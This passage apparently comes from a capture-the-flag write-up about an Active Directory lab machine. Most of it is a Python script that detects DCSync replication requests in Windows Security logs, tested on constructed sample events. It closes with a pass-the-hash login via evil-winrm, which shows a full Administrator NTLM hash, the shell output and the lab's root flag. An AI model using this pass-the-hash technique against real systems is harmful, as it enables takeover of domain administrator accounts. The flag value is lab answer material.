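# plus an explicit allowlist, e.g. a directory sync service account (assumed name).
ALLOWLIST = {"svc_dirsync"}


def is_replication_request(event):
    """True if a 4662 record shows a replication control-access right being used."""
    if event.get("EventID") != 4662:
        return False
    props = event.get("Properties", "").lower()
    return any(g in props for g in REPL_GUIDS)


def classify(event):
    """Return a finding for unexpected replication, or None for expected activity."""
    if not is_replication_request(event):
        return None
    user = event["SubjectUserName"]
    if user.endswith("$") or user.lower() in ALLOWLIST:
        return None                                  # DC or approved sync account
    props = event["Properties"].lower()
    return {
        "user": f"{event['SubjectDomainName']}\\{user}",
        # Get-Changes-All is what exposes password hashes, so rate it higher
        "severity": "high" if DS_REPL_GET_CHANGES_ALL in props else "medium",
        "rights": sorted(g for g in REPL_GUIDS if g in props),
        # SubjectLogonId ties this record to the 4624 logon event carrying the source IP
        "logon_id": event.get("SubjectLogonId"),
    }


def scan(lines):
    """Run classify() over JSON-lines records exported from the DC's Security log."""
    findings = []
    for line in lines:
        if line.strip():
            finding = classify(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample records (not real telemetry): DC-to-DC replication, an
# ordinary attribute read by a user, and a user account requesting both
# replication rights on the domain object, which is what a DCSync looks like.
SAMPLE_LOG = """
{"EventID": 4662, "SubjectUserName": "DC$", "SubjectDomainName": "PUPPY", "SubjectLogonId": "0x3e7", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "levi.james", "SubjectDomainName": "PUPPY", "SubjectLogonId": "0x5a1c2", "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "Properties": "{bf967a68-0de6-11d0-a285-00aa003049e2}"}
{"EventID": 4662, "SubjectUserName": "steph.cooper_adm", "SubjectDomainName": "PUPPY", "SubjectLogonId": "0x7b3f9", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

The same allowlist logic is the mitigation check: any account holding these two rights on the domain object that is neither a DC nor a documented sync account is a DCSync-capable account and should be removed or justified.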
We have the NTLM hash of the Administrator. We are done here: we can connect with the hash (pass-the-hash) using evil-winrm:
└─$ evil-winrm -i 10.10.11.70 -u Administrator -H bb0edc15e49ceb4120c7bd7e6e65d75b
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         3/9/2025   8:25 PM                CLNP
cd ..
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0aa578ded5a96f81e97c8d4eea38df50
Puppy machine pwned!!!!! It was a great machine, to be honest, and I learned a lot from it.